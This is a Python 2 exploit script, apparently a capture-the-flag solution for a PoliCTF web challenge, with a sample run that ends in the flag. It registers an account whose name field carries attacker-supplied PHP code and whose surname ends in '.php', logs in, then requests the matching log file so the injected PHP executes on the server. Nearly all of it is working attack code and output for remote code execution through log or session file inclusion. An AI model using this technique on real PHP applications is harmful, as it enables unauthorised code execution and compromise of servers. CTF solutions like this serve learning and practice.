#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
 
import urllib, urllib2, re, sys, socket, random
 
if len(sys.argv) < 2:
	print "Usage: {0} {1}".format(sys.argv[0], "\"<?php phpinfo(); >\"")
	sys.exit()
 
host = socket.gethostbyaddr("127.0.0.1")[0] #change to your ip
url_register = 'http://magic.polictf.it/index.php?page=register'
url_login = 'http://magic.polictf.it/index.php?page=login'
url_log = 'http://magic.polictf.it/index.php?page=log/{0}'.format(host)
 
random = str(random.randint(100,10000))
name = sys.argv[1]
surname = "{0}.php".format(random)
username = random
password = random
 
def register(name, surname, username, password):
	post_data = urllib.urlencode({'name' : name, 'surname' : surname, 'username' : username, 'password' : password, 'register' : 'send'})
	req = urllib2.Request(url_register, post_data)
	resp = urllib2.urlopen(req).read()
 
def login(username, password):
	post_data = urllib.urlencode({'username' : username, 'password' : password, 'login' : 'login'})
	req = urllib2.Request(url_login, post_data)
	resp = urllib2.urlopen(req).read()
	
def exploit(url_log, surname):
	log_path = "{0}_{1}".format(url_log, surname.replace(".php",""))
	req = urllib2.Request(log_path)
	resp = urllib2.urlopen(req).read()
	return resp
 
print "[*] Register with username: {0}".format(username)
register(name, surname, username, password)
print "[*] Login"
login(username, password)
print "[*] Exploit"
content = exploit(url_log, surname)
result = re.search('name\|(.*)\;surname', content, re.DOTALL)
print "[*] Result: \n",result.group(1)
 
'''
root@ubuntu:~# python web350.py "<?php $magic = new Magic(); $magic->__call(); ?>"
[*] Register with username: 1337
[*] Login
[*] Exploit
[*] Result:
I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}
'''